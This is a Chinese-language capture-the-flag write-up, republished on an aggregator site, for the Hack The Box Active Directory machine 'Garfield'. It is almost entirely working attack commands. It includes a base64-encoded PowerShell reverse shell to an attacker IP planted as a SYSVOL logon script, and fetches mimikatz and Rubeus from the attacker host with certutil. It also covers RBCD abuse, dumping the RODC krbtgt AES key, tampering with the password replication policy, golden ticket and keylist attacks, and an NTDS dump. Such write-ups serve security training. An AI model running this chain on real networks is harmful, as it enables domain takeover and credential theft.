首页 > 基础资料 博客日记
【渗透测试】HTB Season10 Garfield 全过程wp
2026-04-11 03:30:01基础资料围观1次
极客资料网推荐【渗透测试】HTB Season10 Garfield 全过程wp这篇文章给大家,欢迎收藏极客资料网享受知识的乐趣
Garfield
信息收集
┌──(root㉿kali)-[~]
└─# nmap -A -T4 10.129.83.35
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-07 00:38 -0400
Nmap scan report for 10.129.83.35
Host is up (0.39s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
88/tcp open tcpwrapped
135/tcp open tcpwrapped
139/tcp open tcpwrapped
389/tcp open tcpwrapped
445/tcp open tcpwrapped
464/tcp open tcpwrapped
593/tcp open tcpwrapped
636/tcp open tcpwrapped
2179/tcp open tcpwrapped
3268/tcp open tcpwrapped
3269/tcp open tcpwrapped
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=DC01.garfield.htb
| Not valid before: 2026-02-13T01:10:36
|_Not valid after: 2026-08-15T01:10:36
| rdp-ntlm-info:
| Target_Name: GARFIELD
| NetBIOS_Domain_Name: GARFIELD
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: garfield.htb
| DNS_Computer_Name: DC01.garfield.htb
| DNS_Tree_Name: garfield.htb
| Product_Version: 10.0.17763
|_ System_Time: 2026-04-07T12:49:55+00:00
5985/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Host script results:
|_clock-skew: mean: 8h02m28s, deviation: 0s, median: 8h02m28s
| smb2-time:
| date: 2026-04-07T12:49:53
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 ... 30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 591.07 seconds
系统:高度疑似 Windows Server 2019 / Windows 10(版本 10.0.17763)
域名环境:域控制器 DC01.garfield.htb,域名 garfield.htb,域名为 GARFIELD
开放了大量典型 Windows 域控(AD) 端口:
- 53:DNS
- 88:Kerberos
- 135、139、445:RPC / SMB
- 389、636:LDAP / LDAPS
- 464:Kerberos 密码修改
- 593、3268、3269:AD 相关服务
- 3389:RDP 远程桌面
- 5985:WinRM(HTTP 管理)
目标是一台 Active Directory 域控制器(DC)
SMB 签名已启用且强制开启,常规 SMB Relay 攻击难度较大
RDP 证书信息、NTLM 信息泄露了主机名、域名、系统版本
大量端口被防火墙过滤,仅开放域服务端口
系统时间与本地存在约 8 小时时差
针对SMB服务,可以使用NetExec使用提供的用户凭据枚举目标主机上的 SMB 共享目录,并列出权限
nxc smb 10.129.83.35 -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' --shares
nxc smb 10.129.83.35 -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' --users
可以发现有l.wilson和l.wilson_adm
我们再去列出当前用户能 “写入 / 修改” 的所有域对象
使用bloodyAD
bloodyAD --host 10.129.195.195 -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' get writable
可以发现l.wilson和l.wilson_adm有可写权限,说明可以修改这个两个用户的账户,包括重置密码、修改权限、添加到管理员组等
同时可以看到garfield.htb和_msdcs.garfield.htb有可创建子对象的权限,拥有域 DNS 区域的创建子记录权限,这是域内最经典的提权漏洞:DNS 记录篡改(ADIDNS/WPAD 劫持)
尝试去修改密码
bloodyAD --host 10.129.195.195 -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' set password l.wilson 'NewPass@123!'
当前用户 j.arbuckle 对目标对象 CN=Liz Wilson ADM 只有通用的写入权限(WRITE),但没有修改密码的特定权限(User-Change-Password)。
这条路不行,我们当前的环境是garfield.htb域,已经拿到了普通域用户j.arbuckle的权限,并且
- 拥有
SYSVOL共享的读权限 - 对域内用户/对象有写入权限,且域内存在打印机服务相关的组策略配置
smbclient //10.129.195.195/SYSVOL -U 'j.arbuckle'
# 连接SYSVOL共享,遍历scripts目录
cd garfield.htb\scripts
# 进入脚本目录(域内登录脚本默认路径)
ls
把恶意脚本写入组策略登录脚本目录,让域内主机(包括域控)在登录 / 服务启动时自动执行,从而拿到反向 Shell。
漏洞利用
生成powershell反向壳有效载荷
echo '$client = New-Object System.Net.Sockets.TCPClient("'"10.10.16.6"'",9001);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){
$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
$sendback=(iex $data 2>&1|Out-String);
$sendback2=$sendback+"PS "+(pwd).Path+"> ";
$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
$client.Close()' | iconv -t UTF-16LE | base64 -w0
构建.bat文件
cat > printerDetect.bat << 'EOF'
@echo off
powershell -NoP -NonI -W Hidden -Exec Bypass -Enc <BASE64_PAYLOAD>
EOF
上传批处理文件
smbclient //10.129.195.195/SYSVOL -U 'j.arbuckle'
内部:smbclient
cd garfield.htb\scripts
put printerDetect.bat printerDetect.bat
dir
exit
开始触发
给用户 Liz Wilson 设置一个「登录自动执行的脚本」:printerDetect.bat
bloodyAD --host 10.129.195.195 -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' \
set object "CN=Liz Wilson,CN=Users,DC=garfield,DC=htb" \
scriptPath -v printerDetect.bat
得到shell
横向移动
目前我们是l.wilson,我们现在要变成l.wilson_adm
从powershell中去重置l.wilson_adm的密码
Set-ADAccountPassword -Identity "l.wilson_adm" -NewPassword (ConvertTo-SecureString 'WhoKnows123!' -AsPlainText -Force) -Reset
验证WinRM访问
nxc winrm 10.129.195.195 -u 'l.wilson_adm' -p 'WhoKnows123!'
说明修改成功
获得shell
evil-winrm -i 10.129.195.195 -u l.wilson_adm -p 'WhoKnows123!'
提权
信息收集
存在RODC01.garfield.htb
ip为192.168.100.2,然后自己是DC01.garfield.htb,ip为192.168.100.1
可以看到拥有SeMachineAccountPrivilege
且是GARFIELD\Tier 1 组 成员,属于域内服务器 / RODC 的管理员
将自己添加到RODC Administrators
- Tier1 管理员天然拥有该组的管理权限,可直接添加自己,无需提权
- 加入后可修改 RODC 的密码复制策略,缓存域管凭证,直接拿域控权限
- 该组是 AD 标准管理组,成员添加操作默认不触发告警,属于防御盲区
Add-ADGroupMember -Identity "RODC Administrators" -Members "l.wilson_adm"
端口转发,建立隧道
在kali上部署ligolo-ng服务器
# 下载工具
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
# 解压
tar -xzf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
# 创建TUN虚拟网卡ligolo
sudo ip tuntap add user root mode tun ligolo
# 启动网卡
sudo ip link set ligolo up
# 启动代理服务端,监听0.0.0.0:11601,使用自签名证书
./proxy -selfcert -laddr 0.0.0.0:11601
在WinRM中运行agent客户端
agent客户端从https://github.com/nicocha30/ligolo-ng/releases这里下载
然后传入winrm中
kali起一个http服务
Invoke-WebRequest -Uri "http://10.10.16.9:80/agent.exe" -OutFile "agent.exe"
运行agent.exe
.\agent.exe -connect 10.10.16.9:11601 -ignore-cert
在kali中
sudo ip addr add 10.10.16.9/23 dev ligolo
sudo ip route add 192.168.100.0/24 dev tun1
在ligolo交互界面中
# 1. 查看在线Agent(确认ID)
ligolo-ng > session
# 输出会显示Agent列表,ID一般为1
# 2. 选中Agent(用ID,这里是1)
ligolo-ng > session 1
# 输出:[+] Agent selected: 1
# 3. 启动隧道(核心!必须执行)
ligolo-ng > start
# 输出:[+] Tunnel started for agent 1
访问RODC01
nxc smb 192.168.100.2 -u l.wilson_adm -p 'WhoKnows123!'
创建一个fake账户
目前用户已经加入了RODC administrator组,在AD中新建一个可控的计算机账户
AD 中机器账户默认拥有SeMachineAccountPrivilege,可以修改自己的委派属性,且默认审计宽松,不易被发现
impacket-addcomputer garfield.htb/l.wilson_adm:'WhoKnows123!' \
-computer-name 'FAKE$' \
-computer-pass 'FakePass123!' \
-dc-ip 10.129.196.71
我们验证一下
nxc ldap 10.129.196.71 -u l.wilson_adm -p 'WhoKnows123!' --users | grep FAKE
给FAKE$配置对RODC01的RBCD权限
在WinRM中设置委托
Set-ADComputer RODC01 -PrincipalsAllowedToDelegateToAccount FAKE$
Get-ADComputer RODC01 -Properties PrincipalsAllowedToDelegateToAccount
RBCD配置成功
冒充RODC01管理员
请求服务票
impacket-getST garfield.htb/'FAKE$':'FakePass123!' \
-spn cifs/RODC01.garfield.htb \
-impersonate Administrator \
-dc-ip 10.129.196.71
在这之前要统一时间
ntpdate 10.129.196.71
出口票
export KRB5CCNAME=$(pwd)/Administrator@cifs_RODC01.garfield.htb@GARFIELD.HTB.ccache
echo $KRB5CCNAME
获取system到RODC01
impacket-psexec -k -no-pass \
-dc-ip 10.129.196.71 \
-target-ip 192.168.100.2 \
garfield.htb/Administrator@RODC01.garfield.htb
导出AES256密钥krbtgt_8245
为后续黄金票据(Golden Ticke)攻击做准备
Kali 侧搭建 HTTP 服务,托管 mimikatz
cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe /tmp/
cd /tmp
python3 -m http.server 8888
下载Mimikatz在RODC01上
cd C:\Windows\Temp
certutil -urlcache -split -f http://10.10.16.9:80/mimikatz.exe mimikatz.exe
mimikatz.exe
Mimikatz内部:
privilege::debug
# 1. 提升debug权限(SYSTEM用户必须执行,否则无法读取LSASS内存)
lsadump::lsa /inject /name:krbtgt_8245
# 2. 注入lsass进程,导出krbtgt账户的凭证(指定/name:krbtgt_8245是为了精准提取)
AES256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240
SID:S-1-5-21-2502726253-3859040611-225969357
RODC编号 8245
在WinRM加载PowerView
cd /usr/share/windows-resources/powersploit/Recon/
python3 -m http.server 8888
在WinRM上(下载并加载 PowerView)
cd C:\Users\l.wilson_adm\Desktop
certutil -urlcache -split -f http://10.10.16.9:80/PowerView.ps1 PowerView.ps1
Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\PowerView.ps1
Get-Command *DomainObject*
Set-DomainObject -Identity RODC01$ -Set @{
'msDS-RevealOnDemandGroup'=@(
'CN=Allowed RODC Password Replication Group,CN=Users,DC=garfield,DC=htb',
'CN=Administrator,CN=Users,DC=garfield,DC=htb'
)
}
Set-DomainObject -Identity RODC01$ -Clear 'msDS-NeverRevealGroup'
Get-ADComputer RODC01 -Properties msDS-RevealOnDemandGroup,msDS-NeverRevealGroup
| 属性名 | 作用 | 操作目的 |
|---|---|---|
msDS-RevealOnDemandGroup |
允许 RODC 缓存密码的用户 / 组 | 把 Administrator 手动加入允许列表,让 RODC 缓存管理员的密码哈希 / AES 密钥 |
msDS-NeverRevealGroup |
禁止 RODC 缓存密码的用户 / 组(默认包含域管理员组) | 清空这个属性,删除管理员的「禁止缓存」限制 |
Get-ADComputer |
验证属性修改结果 | 确认 RODC 的 PRP 已成功修改 |
金票+Keylist攻击
Rubeus 是 C# 编写的 Windows 平台 Kerberos 攻击神器,是红队域渗透的「瑞士军刀」,核心功能包括:
- 黄金票据 / 白银票据伪造
- 票据抓取(Pass-the-Ticket)
- 票据传递(Pass-the-Key)
- AS-REP roasting、Kerberoasting
- 票据缓存操作、权限提升
- 配合 krbtgt 密钥做域内完全控制
kali:
wget https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/Rubeus.exe -O /tmp/Rubeus.exe
cd /tmp
python3 -m http.server 8888
在WinRM中
certutil -urlcache -split -f http://10.10.16.9:80/Rubeus.exe Rubeus.exe
dir Rubeus.exe
.\Rubeus.exe
使用Rubeus伪造TGT票据
.\Rubeus.exe golden `
/rodcNumber:8245 `
/flags:forwardable,renewable,enc_pa_rep `
/nowrap `
/outfile:ticket.kirbi `
/aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 `
/user:Administrator `
/id:500 `
/domain:garfield.htb `
/sid:S-1-5-21-2502726253-3859040611-225969357
再进行keylist攻击
.\Rubeus.exe asktgs `
/enctype:aes256 `
/keyList `
/service:krbtgt/garfield.htb `
/dc:DC01.garfield.htb `
/ticket:ticket_2026_04_10_22_51_40_Administrator_to_krbtgt@GARFIELD.HTB.kirbi `
/nowrap
得到base64
doIFnjCCBZqgAwIBBaEDAgEWooIEsTCCBK1hggSpMIIEpaADAgEFoQ4bDEdBUkZJRUxELkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMR0FSRklFTEQuSFRCo4IEaTCCBGWgAwIBEqEDAgECooIEVwSCBFOePzDBtTi9XdGg0eRMf2uOoJkNZCG3liHNM3YTSTKq0UfUD1YclBUsi2Z3Qu1bu+Y7HG5e6xqYtOnu029SvXLW4QwXlTc12Y0KaXva8w0ezd6ecpjMusLPKPkzCyYg7aG8CV+WferApqrgJ5HKnDLsTcWMGjQ8kDA3nYPaYmYs2HNePWK9PYhq4non65NjECblWbwCr6PKXLakWmc0PMq1ja5l/RT3iSZ/87/KA76wlYhVZ1uEc3qUv9H555gUD/CVEsHDfzep/D9ToDZb8LH6sn+MHdKvleHZgzhJLqqdF1DaKPZMs81r8crBiyNtUlucy61R4VBIHijFujjc3CMxES1/FEFVWDfA8WzvdtqO4JLErG6BSqx/70OY2porb7OJK/MZe/e7t/LsJuyeRGjhaSDd4trM46SOr00IXtuEQXCR4omK3RLsyOKrfMJfsqq1+SVYIF4qEfdRq/T60u+T89y0SOJ/NkhwLEX5pl51gUwNvxMLBT3SMGLYO4SsH6paEQFX2s4pX8J8FG1OLOZdmiz8GQBCQy8Mr2bRffJ4dky7guyYHd4EZWAWGYrvg/Jnd8Rv5U3x5Lk8PO23DWgQU2Rx9y4doEpaG7B8DpFcrw8ZnJn9QCrh6Tv+xFxyi+TRrRpHJZWulYKntmsLqmXN63URJYIefcUiqvVZY/ujLw+cXvSfuGbWXXC+p/Y7Qz/5TOBVOCf/h7G9A7hLXy7Ux7E92MLhpteD6lbL5WUH+GSUqPVrUTGmu8pBXnRYNQei1zj8BhbuC6Eot46MEBrvO2kn507mFhNhaXK1Nd9F0To3Mo3B0+dSer9N5GHAgKZwuRnXPyPjQYii17q1CByvXMpRNO6lDDUYWnejKeaVE6mFv0O7C2s0ZV5xAN2rI+JB4pKiVusSI0Bxx33JEiBRKNnd2lztSNMv4B6VBaelknZ0//GikTXUsh5sVtpx3+zvp/d9pcPibExQyAH/Vk0un79QEN4olBCQST61LoV/n7JeQwF8CzM1Q5JUaVtne7tInkal+YfhMDK6QQCR8h5OzUjj4s/BDfqBExW38/5bdWWG5TiqsigNuI7YdC54ix5NaXxSDesi/YTdvQCYqczN35TeJ2+Mim3HeS5y8d9ph6vea5SBYV4dHnWUOPWfwIlgTG0VyBe/WFodkf56Q8pLJqC5hqnjjRO9zH28DCZ6obXJBrP6bsEr3wuMoShF3QunxBLXH9/NSFOOayEDCKgGkXc8khBty4hSNREOCYeKETSfZh102XvCX//XPj/Ll0iiiwjMvSZKfp3OnI1bFSrc1udx1DVCOmNlQlARoFgexsxzYdNsk/FipS88iWGqX1ehf1jmpiZQcAOtNUDjvM2j36ZnyTcq707kUJflM1xdzVjbRCkJB+KHgwSCCXgvERUD44wiBUKuhIKmjAmMDWHMNQt88BoMrbNYekrFEGxEmRBkVvi0BB0cLeD+IO0tKOmXTSejgdgwgdWgAwIBAKKBzQSByn2BxzCBxKCBwTCBvjCBu6ArMCmgAwIBEqEiBCAq6cBaPF+IX/NgC4mHeb+HnKmiP/Ifbeidjm/pJGCXnaEOGwxHQVJGSUVMRC5IVEKiGjAYoAMCAQGhETAPGw1BZG1pbmlzdHJhdG9yowcDBQAAAQAApREYDzIwMjYwNDEwMjI1MzI2WqYRGA8yMDI2MDQxMTA4NTE0MFqoDhsMR0FSRklFTEQuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxHQVJGSUVMRC5IVEI=
将base64 记录在kali本地
sed -i 's/^[[:space:]]*//' ticket.b64
tr -d '\r\n\t ' < ticket.b64 | base64 -d > ticket.kirbi
# 1. 用Impacket的ticketConverter工具,把.kirbi转换成.ccache
impacket-ticketConverter ticket.kirbi ticket.ccache
# 2. 导出环境变量,让Impacket工具自动使用这个票据
export KRB5CCNAME=ticket.ccache
# 3. 验证环境变量生效
echo $KRB5CCNAME
用真实管理员票弃掉NTDS
nxc smb DC01.garfield.htb --use-kcache --ntds
最终得到管理员
evil-winrm -i 10.129.196.71 -u Administrator -H 'ee238f6debc752010428f20875b092d5'
文章来源:https://www.cnblogs.com/DSchenzi/p/19849166
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:jacktools123@163.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:jacktools123@163.com进行投诉反馈,一经查实,立即删除!
标签:
上一篇:Claude 和 Codex 在审计 Skill 上性能差异探究
下一篇:没有了
相关文章
最新发布
点击排行
本站推荐
